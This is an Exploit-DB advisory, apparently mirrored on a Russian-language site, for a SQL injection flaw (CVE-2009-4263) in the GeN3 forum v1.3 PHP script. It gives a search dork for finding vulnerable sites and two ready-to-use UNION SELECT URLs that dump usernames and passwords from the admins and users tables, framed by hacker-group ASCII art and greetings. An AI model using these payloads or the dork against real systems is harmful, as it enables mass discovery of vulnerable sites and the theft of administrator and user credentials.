- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10299
- Проверка EDB
-
- Пройдено
- Автор
- DR.0RYX & CR3W-DZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4263
- Дата публикации
- 2009-12-04
Код:
# Author: Dr.0rYX & Cr3w-DZ
# Software Link: http://www.ptcpay.com/shop/browse_products.php
###############################
NN N AAAAAA SSSSSSSSS
NNN N A A S
N NN N A A S
N NN N A A S TTTTTT EEEEE AAAA MM MM
N NN N AAAAAAAA SSSSSSSSS TT E A A M M M M
N NN N A A S TT E A A M M M
N NN N A A S TT EEEE AAAAAA M M
N NNN A A S TT E A A M M
N NN A A S TT E A A M M
N N A A SSSSSSSSS TT EEEEE A A M M
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] GeN3 forum V1.3 SQL injection vulnerability
[!] Author : Dr.0rYX & Cr3w-DZ
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.ptcpay.com
[+] script : GeN3 Version 1.3
[+] Download : http://www.ptcpay.com/shop/browse_products.php
[+] Version() : 1.3
[+] Vulnerability : SQL injection
[+] Dork :inurl:"main_forum.php?cat="
**************************************************************************/
[ Vulnerable File ]
http://server/path/main_forum.php?cat=[N.A.S.T ]
[ Exploit ]
http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--
http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(userid,0x3a,Username,0x3a,password),3,4,5,6,7+FROM+users--
[ GReet ]
[+] :Cr3W-DZ , xcv-dz , CLAW , kader11000 , exploit-db.com , ALL HACKERS MUSLIMS- Источник
- www.exploit-db.com
